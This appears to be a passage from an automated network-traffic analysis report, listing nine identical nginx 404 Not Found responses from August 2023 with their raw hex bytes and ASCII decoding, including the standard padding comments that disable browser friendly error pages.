                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:29 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
